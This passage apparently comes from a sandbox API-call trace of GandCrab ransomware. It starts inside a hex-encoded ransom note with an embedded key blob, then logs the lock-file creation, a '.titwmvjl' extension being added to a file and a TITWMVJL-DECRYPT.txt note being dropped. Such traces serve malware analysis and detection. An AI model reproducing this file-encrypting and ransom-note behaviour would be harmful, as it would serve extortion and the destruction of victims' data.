x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.811] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0069.812] CloseHandle (hObject=0x2bc) returned 1 [0069.812] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.812] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.813] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x79)) [0069.813] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.813] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.813] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.813] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock") returned 82 [0069.813] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0069.813] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.814] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 58 [0069.814] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0069.814] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5033f8 [0069.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.814] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.814] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.814] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.814] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.814] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.814] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.814] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock" [0069.814] lstrlenW (lpString=".titwmvjl") returned 9 [0069.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock") returned 82 [0069.814] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.814] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 91 [0069.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\d2ca4a09d2ca4deb61a.lock") returned 82 [0069.814] lstrlenW (lpString=".lock") returned 5 [0069.814] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.815] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.815] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.815] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.815] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.815] lstrcmpW (lpString1="Logs", lpString2=".") returned 1 [0069.815] lstrcmpW (lpString1="Logs", lpString2="..") returned 1 [0069.815] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="Logs" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs" [0069.815] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\" [0069.815] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.816] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.816] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.816] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.817] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\\\TITWMVJL-DECRYPT.txt") returned 84 [0069.817] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logs\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0069.817] lstrlenW 